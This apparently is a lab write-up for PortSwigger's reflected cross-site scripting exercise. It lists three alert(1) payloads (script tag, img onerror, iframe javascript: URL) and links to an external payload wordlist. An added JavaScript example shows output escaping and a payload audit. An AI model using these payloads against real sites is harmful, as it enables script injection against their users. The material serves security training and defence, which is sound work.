Burp Suite Labs ---- XSS ---- Reflected XSS 1
Lab URL
https://portswigger.net/web-security/cross-site-scripting/reflected/lab-html-context-nothing-encoded
XSS payload wordlist
Link: https://pan.baidu.com/s/1XAJbEc4o824zAAmvV85TOA
Extraction code: 1234
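Getting started
1. First, enter a long string of characters.
2. View the page source and find where the entered string appears.
3. The goal of this lab is to trigger an alert popup.
payload1: <script>alert(1)</script>
payload2: <img src=x onerror=alert(1)>
payload3: <iframe src=javascript:alert(1)>
and so on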
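The reflection check from steps 1 and 2 and the fix for this kind of sink, as an added example that is not part of the original post. The page template and all function names are constructed for illustration; the three payloads are the ones listed above.

```javascript
// Added example. Function names and the page template are constructed for illustration.

// Encode the characters that carry meaning in HTML text and quoted attributes.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Before: the search term lands between tags with nothing encoded.
function renderRaw(term) {
  return `<section><h1>0 search results for '${term}'</h1></section>`;
}

// After: same template, term encoded at output time.
function renderEncoded(term) {
  return `<section><h1>0 search results for '${escapeHtml(term)}'</h1></section>`;
}

// Steps 1-2 as a check: submit a unique marker that contains markup characters
// and see whether the response carries it back byte for byte.
function reflectedUnencoded(render, marker = "zq7x9<>\"'&") {
  return render(marker).includes(marker);
}

// The three payloads listed in the post.
const payloads = [
  "<script>alert(1)</script>",
  "<img src=x onerror=alert(1)>",
  "<iframe src=javascript:alert(1)>",
];

// For each payload, report whether it survives rendering unchanged.
function audit(render) {
  return payloads.map((p) => ({ payload: p, intact: render(p).includes(p) }));
}

console.log("raw template reflects marker unencoded:", reflectedUnencoded(renderRaw));
console.log("encoded template reflects marker unencoded:", reflectedUnencoded(renderEncoded));
console.log(audit(renderEncoded));
```

Encoding at output time is what makes the marker and all three payloads come back as inert text instead of markup.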